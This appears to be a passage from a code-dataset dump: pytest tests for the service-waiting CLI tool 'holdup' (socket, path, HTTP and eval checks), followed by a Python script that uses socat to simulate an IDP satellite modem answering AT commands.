        'unix:///tmp/holdup-test.sock',
        *extra
    )
    if extra:
        result.stdout.fnmatch_lines(['success !'])
    assert result.ret == 0
    t.join()
    # NOTE(review): the sockets and /tmp files are deliberately not cleaned
    # up; later tests (test_any) appear to rely on the leftover file.
@pytest.mark.parametrize('status', [200, 404])
@pytest.mark.parametrize('proto', ['http', 'https'])
def test_http(testdir, extra, status, proto):
    """HTTP(S) checks succeed on 200 and report the error on 404.

    NOTE(review): depends on the external httpbin.org service being
    reachable -- flaky offline.
    """
    result = testdir.run(
        'holdup',
        '-T', '5',
        '-t', '5.1',
        '%s://httpbin.org/status/%s' % (proto, status),
        *extra
    )
    if extra:
        if status == 200:
            result.stdout.fnmatch_lines(['success !'])
        else:
            result.stderr.fnmatch_lines(['*HTTP Error 404*'])
@pytest.mark.skipif("urlopen_has_ssl_context()")
def test_http_insecure_with_option(testdir):
    """--insecure skips certificate verification (self-signed endpoint)."""
    result = testdir.run(
        'holdup',
        '-t', '2',
        '--insecure',
        'https://self-signed.badssl.com/',
    )
    assert result.ret == 0
@pytest.mark.skipif("urlopen_has_ssl_context()")
def test_http_insecure_with_proto(testdir):
    """The https+insecure:// scheme also skips certificate verification."""
    result = testdir.run(
        'holdup',
        '-t', '2',
        'https+insecure://self-signed.badssl.com/',
    )
    assert result.ret == 0
def test_any(testdir, extra):
    """A comma-separated 'any' group passes when at least one member passes.

    The tcp socket is bound but never put into listening mode, so only the
    path:// member can succeed here.
    """
    tcp = socket.socket()
    tcp.bind(('127.0.0.1', 0))
    _, port = tcp.getsockname()
    uds = socket.socket(socket.AF_UNIX)
    if os.path.exists('/tmp/holdup-test.sock'):
        os.unlink('/tmp/holdup-test.sock')
    # NOTE(review): /tmp/holdup-test itself is assumed to exist -- it is
    # created by test_normal; confirm test ordering is guaranteed.
    uds.bind('/tmp/holdup-test.sock')
    uds.listen(1)
    result = testdir.run(
        'holdup',
        '-v',
        '-t', '0.5',
        'tcp://localhost:%s/,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock' % port,
        *extra
    )
    if extra:
        result.stdout.fnmatch_lines([
            'holdup: Waiting for 0.5s (0.5s per check, 0.2s sleep between loops) for these services: '
            'any(tcp://localhost:*,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock)',
            'holdup: Passed check: path:///tmp/holdup-test',
            'holdup: Passed check: any(tcp://localhost:*,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock)',
            'holdup: Executing: python -c \'print("success !")\'',
            'success !'
        ])
    assert result.ret == 0
def test_any_same_proto(testdir, extra):
    """'any' groups can name two endpoints of the same protocol."""
    tcp1 = socket.socket()
    tcp1.bind(('127.0.0.1', 0))  # bound but not listening: must fail
    _, port1 = tcp1.getsockname()
    tcp2 = socket.socket()
    tcp2.bind(('127.0.0.1', 0))
    tcp2.listen(1)
    _, port2 = tcp2.getsockname()
    # accept() blocks until holdup's probe connects; run it off-thread.
    t = threading.Thread(target=tcp2.accept)
    t.start()
    result = testdir.run(
        'holdup',
        '-t', '0.5',
        'tcp://localhost:%s,localhost:%s/' % (port1, port2),
        *extra
    )
    if extra:
        result.stdout.fnmatch_lines(['success !'])
    assert result.ret == 0
    t.join()
def test_any_failed(testdir):
    """An 'any' group fails (and aborts) only when every member fails."""
    tcp = socket.socket()
    tcp.bind(('127.0.0.1', 0))  # bound but not listening: connection refused
    _, port = tcp.getsockname()
    result = testdir.run(
        'holdup',
        '-t', '0.5',
        'tcp://localhost:%s/,path:///doesnt/exist,unix:///doesnt/exist' % port,
    )
    result.stderr.fnmatch_lines([
        'holdup: Failed service checks: any(tcp://localhost:%s,path:///doesnt/exist,unix:///doesnt/exist) '
        '(Nothing succeeded: '
        'tcp://localhost:%s (*), '
        'path:///doesnt/exist (*), '
        'unix:///doesnt/exist (*). Aborting!' % (port, port)
    ])
def test_no_abort(testdir, extra):
    """With -n, failed checks are reported but holdup does not abort."""
    result = testdir.run(
        'holdup',
        '-t', '0.1',
        '-n',
        'tcp://localhost:0',
        'tcp://localhost:0/',
        'path:///doesnt/exist',
        'unix:///doesnt/exist',
        *extra
    )
    result.stderr.fnmatch_lines([
        'holdup: Failed checks: tcp://localhost:0 (*), '
        'path:///doesnt/exist (*), unix:///doesnt/exist (*)'
    ])
@pytest.mark.skipif(os.path.exists('/.dockerenv'), reason="chmod(0) does not work in docker")
def test_not_readable(testdir, extra):
    """A path:// check fails when the file exists but is not readable."""
    foobar = testdir.maketxtfile(foobar='')
    foobar.chmod(0)  # remove all permissions so the R_OK access test fails
    result = testdir.run(
        'holdup',
        '-t', '0.1',
        '-n',
        'path://%s' % foobar,
        *extra
    )
    result.stderr.fnmatch_lines(["holdup: Failed checks: path://%s (Failed access('%s', 'R_OK') test.)" % (foobar, foobar)])
def test_bad_timeout(testdir):
    """--timeout smaller than --check-timeout must be rejected with an error."""
    res = testdir.run('holdup', '-t', '0.1', '-T', '2', 'path:///')
    res.stderr.fnmatch_lines([
        '*error: --timeout value must be greater than --check-timeout value!'
    ])
def test_eval_bad_import(testdir):
    """An eval:// spec referencing a missing module fails argument parsing."""
    res = testdir.run('holdup', 'eval://foobar123.foo()')
    res.stderr.fnmatch_lines([
        "*error: argument service: Invalid service spec 'foobar123.foo()'. Import error: No module named*"
    ])
def test_eval_bad_expr(testdir):
    """A syntactically invalid eval:// expression is rejected with a caret
    diagram pointing at the offending token."""
    result = testdir.run(
        'holdup',
        'eval://foobar123.foo(.)'
    )
    result.stderr.fnmatch_lines([
        "*error: argument service: Invalid service spec 'foobar123.foo(.)'. Parse error:",
        '  foobar123.foo(.)',
        '* ^',
        'invalid syntax (<unknown>, line 1)',
    ])
def test_eval_bad_pg(testdir):
    """A psycopg2 connect to a dead server shows up as a failed eval check."""
    pytest.importorskip('psycopg2')
    res = testdir.run(
        'holdup', '-t', '0.1',
        'eval://psycopg2.connect("dbname=foo host=0.0.0.0")')
    res.stderr.fnmatch_lines([
        'holdup: Failed service checks: eval://psycopg2.connect* (*'
    ])
def test_eval_falsey(testdir):
    """An eval check whose expression is falsey aborts with exit code 1."""
    res = testdir.run('holdup', '-t', '0', 'eval://None')
    res.stderr.fnmatch_lines([
        "holdup: Failed service checks: eval://None (Failed to evaluate 'None'. Result None is falsey.). Aborting!"
    ])
    assert res.ret == 1
def test_eval_distutils(testdir, extra):
    """eval:// can call into stdlib modules (distutils.spawn here).

    NOTE(review): distutils was removed from the stdlib in Python 3.12 --
    confirm on modern interpreters.
    """
    res = testdir.run(
        'holdup',
        'eval://distutils.spawn.find_executable("find")',
        *extra
    )
    if extra:
        res.stdout.fnmatch_lines(['success !'])
    assert res.ret == 0
def test_eval_comma(testdir, extra):
    """Commas inside an eval:// expression are not treated as check separators."""
    res = testdir.run(
        'holdup',
        'eval://os.path.join("foo", "bar")',
        *extra
    )
    if extra:
        res.stdout.fnmatch_lines(['success !'])
    assert res.ret == 0
def test_eval_comma_anycheck(testdir, extra):
    """An eval:// member with commas still parses inside an 'any' group."""
    res = testdir.run(
        'holdup',
        'path://whatever123,eval://os.path.join("foo", "bar")',
        *extra
    )
    if extra:
        res.stdout.fnmatch_lines(['success !'])
    assert res.ret == 0
|
socat_idp_sim.py | #!/usr/bin/env python
import threading
import subprocess
import serial
import time
import binascii
import base64
def socat(dte='./simdte', dce='./simdce'):
    '''
    Start a socat proxy for a given source to a given target.

    Creates two linked pseudo-terminals at the given paths; the process is
    left running (it is started from a daemon thread by the callers).
    '''
    # IMPROVED: pass an argv list instead of a formatted shell string --
    # avoids shell=True and any quoting pitfalls if the link paths ever
    # contain spaces or shell metacharacters.
    cmd = ['socat', '-d', '-d', '-v',
           'pty,rawer,echo=0,link={}'.format(dte),
           'pty,rawer,echo=0,link={}'.format(dce)]
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    #(output, err) = p.communicate()
    # print(output) if not err else print(err)
def simulate(dte_name='./simdte', dce_name='./simdce'):
    """Emulate an IDP modem on the DCE end of a socat pty pair.

    Starts the socat proxy on a daemon thread, then services AT commands
    arriving on *dce_name* until a literal 'QUIT' is received or the user
    interrupts. NOTE: always terminates the interpreter via exit() in the
    finally block -- this is a standalone simulator, not a library call.
    """
    try:
        socat_thread = threading.Thread(
            target=socat, args=(dte_name, dce_name), daemon=True)
        socat_thread.start()
        time.sleep(1)  # give socat a moment to create the pty links
        dce = serial.Serial(port=dce_name, baudrate=9600)
        terminate = False

        def dce_write(data, delay=0):
            # Optional delay mimics real modem response latency.
            time.sleep(delay)
            dce.write(data.encode())

        mt_message_queue = []
        mo_message_queue = []
        ok_responses = ['AT', 'ATZ', 'AT&W']
        while dce.isOpen() and not terminate:
            if dce.inWaiting() > 0:
                rx_data = dce.read(dce.inWaiting()).decode().strip()
                print('Received: {}'.format(rx_data))
                if rx_data == 'QUIT':
                    terminate = True
                elif rx_data in ok_responses:
                    dce_write('\r\nOK\r\n')
                elif rx_data == 'AT&V':
                    delay = 2
                    response = '\r\nACTIVE CONFIGURATION:' \
                        '\r\nE1 Q0 V1 CRC=0' \
                        '\r\nS0:000 S3:013 S4:010 S5:008 S6:000 S7:000 S8:000 S10:000 ' \
                        'S31:00080 S32:00025 S33:000 S34:007 S35:000 S36:00000 S37:00200 ' \
                        'S38:001 S40:000 S41:00180 S42:65535 S50:000 S52:02500 S53:000 ' \
                        'S60:001 S61:000 S62:001 S63:000 S64:042 S88:00000 S90:000 S91:000 ' \
                        '\r\n\r\nOK\r\n'
                    dce_write(response, delay)
                elif rx_data == 'AT+GSN;+GMR':
                    response = '\r\n+GSN: 00000000MFREE3D\r\n\r\n+GMR: 3.003,3.1,8\r\n' \
                        '\r\nOK\r\n'
                    dce_write(response)
                elif rx_data == 'ATS39? S41? S51? S55? S56? S57?':
                    response = '\r\n010\r\n\r\n00180\r\n\r\n000\r\n' \
                        '\r\n000\r\n\r\n000\r\n\r\n009\r\n' \
                        '\r\nOK\r\n'
                    dce_write(response)
                elif rx_data == 'ATS90=3 S91=1 S92=1 S122? S116?':
                    # TODO: model different progressions from unregistered
                    response = '\r\n0000000010\r\n\r\n0000004093\r\n\r\nOK\r\n'
                    dce_write(response)
                elif rx_data == 'AT%MGFN':
                    # TODO: model none, one, some
                    response = '\r\n%MGFN: "FM22.03",22.3,0,255,2,2,2\r\n' \
                        '"FM23.03",23.3,0,255,2,2,2\r\n' \
                        '"FM24.03",24.3,0,255,2,2,2\r\n' \
                        '"FM25.03",25.3,0,255,2,2,2\r\n' \
                        '"FM26.03",26.3,0,255,2,2,2\r\n' \
                        '"FM27.03",27.3,0,255,2,2,2\r\n' \
                        '"FM26.04",26.4,0,255,2,2,2\r\n' \
                        '\r\nOK\r\n'
                    dce_write(response)
                elif 'AT%MGFG=' in rx_data:
                    # Fetch a mobile-terminated message in the requested format.
                    msg_name, data_format = (rx_data.split('=')[1]).split(',')
                    # data_type = int(data_type)
                    msg_name = msg_name.replace('"', '')
                    if msg_name in mt_message_queue and data_format in ['1', '2', '3']:
                        major, minor = msg_name.replace('FM', '').split('.')
                        msg_num = '.'.join([major, str(int(minor))])
                        msg_sin = 255
                        msg_min = 255
                        payload = b'Hello World'
                        data_bytes = bytearray(
                            [msg_sin, msg_min]) + bytearray(payload)
                        priority = '0'
                        state = '2'
                        length = len(data_bytes)
                        if data_format == '1':
                            msg_data = '\"{}\"'.format(data_bytes.decode())
                        elif data_format == '2':
                            # NOTE(review): hexlify/b64encode return bytes, so
                            # the formatted reply contains a b'...' literal --
                            # confirm clients tolerate this.
                            msg_data = binascii.hexlify(data_bytes)
                        else:
                            msg_data = base64.b64encode(data_bytes)
                        response = '\r\nAT%MGFG: \"{}\",{},{},{},{},{},{},{}' \
                            '\r\nOK\r\n'.format(msg_name, msg_num, priority,
                                                msg_sin, state, length, data_format, msg_data)
                    else:
                        response = '\r\nERROR\r\n'
                        # TODO: set "last error S register"
                    dce_write(response)
                elif 'AT%MGFM=' in rx_data:
                    # Delete a mobile-terminated message by name.
                    msg_name = rx_data.split('=')[1].replace('"', '')
                    if msg_name in mt_message_queue:
                        response = '\r\nOK\r\n'
                    else:
                        response = '\r\nERROR\r\n'
                    dce_write(response)
                elif 'AT%MGRT=' in rx_data:
                    # Queue a mobile-originated message.
                    # NOTE(review): rx_data[6:] keeps the trailing 'T=' of the
                    # command prefix in msg_name -- looks like it should be
                    # rx_data[8:]; left as-is pending confirmation.
                    msg_name, priority, sin_min, data_format, data = rx_data[6:].split(
                        ',')
                    mo_message_queue.append(msg_name)
                    response = '\r\nOK\r\n'
                    dce_write(response)
                elif 'AT%MGRS' in rx_data:
                    # TODO: MGRS= is for single or without = means 'all'
                    # format(msg_name, msg_num, priority, sin, state, length, bytesPktd)
                    response = '%MGRS: '
                    msg_name = None
                    if '=' in rx_data:
                        msg_name = rx_data.split('=')[1].replace('"', '')
                    if msg_name is not None:
                        response += '\"{}\",0,0,255,2,2,2\r\n'.format(msg_name)
                    else:
                        for msg_name in mo_message_queue:
                            # BUGFIX: was 'reponse +=' -- a NameError on the
                            # list-all path whenever a message was queued.
                            response += '\"{}\",0,0,255,2,2,2\r\n'.format(
                                msg_name)
                    response += '\r\nOK\r\n'
                    dce_write(response)
                elif 'AT%GPS=' in rx_data:
                    # Reference transcripts of full fix / no-fix replies
                    # (unused by the logic below, kept for documentation).
                    example_response = '\r\n%GPS: $GNRMC,221511.000,A,4517.1073,N,07550.9222,W,0.07,0.00,150320,,,A,V*10\r\n' \
                        '$GNGGA,221511.000,4517.1073,N,07550.9222,W,1,08,1.3,135.0,M,-34.3,M,,0000*7E\r\n' \
                        '$GNGSA,A,3,28,17,30,11,19,07,,,,,,,2.5,1.3,2.1,1*37\r\n' \
                        '$GNGSA,A,3,87,81,,,,,,,,,,,2.5,1.3,2.1,2*32\r\n' \
                        '$GPGSV,2,1,08,01,,,42,07,18,181,35,11,32,056,29,17,48,265,35,0*5D\r\n' \
                        '$GPGSV,2,2,08,19,24,256,37,28,71,317,30,30,42,209,45,51,29,221,40,0*69\r\n' \
                        '$GLGSV,1,1,04,81,22,232,36,86,00,044,,87,57,030,42,,,,37,0*40\r\n' \
                        '\r\nOK\r\n'
                    example_nofix = '\r\n%GPS: $GNRMC,014131.000,V,,,,,,,160320,,,N,V*29' \
                        '\r\n$GNGGA,014131.000,,,,,0,06,2.2,,,,,,0000*48' \
                        '\r\n$GNGSA,A,1,19,17,28,,,,,,,,,,4.5,2.2,3.9,1*3C\r\n' \
                        '$GNGSA,A,1,81,80,79,,,,,,,,,,4.5,2.2,3.9,2*34\r\n' \
                        '$GPGSV,2,1,08,02,50,263,35,06,,,38,12,,,38,17,47,104,38,0*66\r\n' \
                        '$GPGSV,2,2,08,19,68,088,30,28,11,164,41,46,33,210,37,51,29,221,40,0*6B\r\n' \
                        '$GLGSV,1,1,03,79,19,217,47,80,36,276,35,81,53,050,36,0*4C\r\n' \
                        '\r\nOK\r\n'
                    # Assemble only the sentence types the command requested.
                    response = '%GPS: '
                    parts = rx_data.split(',')
                    for part in parts:
                        if part == 'GGA':
                            response += '\r\n' if response != '%GPS: ' else ''
                            response += '$GNGGA,221511.000,4517.1073,N,07550.9222,W,1,08,1.3,135.0,M,-34.3,M,,0000*7E\r\n'
                        elif part == 'RMC':
                            response += '\r\n' if response != '%GPS: ' else ''
                            response += '$GNRMC,221511.000,A,4517.1073,N,07550.9222,W,0.07,0.00,150320,,,A,V*10\r\n'
                        elif part == 'GSA':
                            response += '\r\n' if response != '%GPS: ' else ''
                            response += '$GNGSA,A,3,28,17,30,11,19,07,,,,,,,2.5,1.3,2.1,1*37\r\n' \
                                '$GNGSA,A,3,87,81,,,,,,,,,,,2.5,1.3,2.1,2*32\r\n'
                        elif part == 'GSV':
                            response += '\r\n' if response != '%GPS: ' else ''
                            response += '$GPGSV,2,1,08,01,,,42,07,18,181,35,11,32,056,29,17,48,265,35,0*5D\r\n' \
                                '$GPGSV,2,2,08,19,24,256,37,28,71,317,30,30,42,209,45,51,29,221,40,0*69\r\n'
                    response += '\r\nOK\r\n'
                    dce_write(response, 3)  # GPS fix takes a few seconds
                elif rx_data == 'ATS80?':  # last error code
                    response = '\r\n104\r\n\r\nOK\r\n'
                    dce_write(response)
                else:
                    # TODO: %CRC, %OFF, %TRK, %UTC
                    print('WARNING: {} command unsupported'.format(rx_data))
                    response = '\r\nERROR\r\n'
                    dce_write(response)
    except KeyboardInterrupt:
        print('\nKeyboard Interrupt')
    except Exception as e:
        print(e)
    finally:
        # Deliberately terminates the whole interpreter (standalone tool).
        exit()
def main():
    """Smoke-test the socat pty pair: periodically write 'TEST' from the
    DTE end and print whatever arrives on the DCE end."""
    dte_name = './simdte'
    dce_name = './simdce'
    try:
        socat_thread = threading.Thread(
            target=socat, args=(dte_name, dce_name), daemon=True)
        socat_thread.start()
        time.sleep(1)  # give socat a moment to create the pty links
        dte = serial.Serial(port=dte_name, baudrate=9600)
        dce = serial.Serial(port=dce_name, baudrate=9600)
        cycles = 0
        while dte.isOpen() and dce.isOpen():
            if dce.inWaiting() > 0:
                print('\nRead: {}'.format(dce.read(dce.inWaiting()).decode()))
            if cycles == 3:
                print('Write:', end=' ')
                dte.write('TEST'.encode())
                cycles = 0
            cycles += 1
            time.sleep(1)  # one poll per second
    except KeyboardInterrupt:
        print('Keyboard interrupt')
    except Exception as e:
        print(e)
    finally:
        # socat_thread.join()
        # Deliberately terminates the whole interpreter (standalone tool).
        exit()


if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.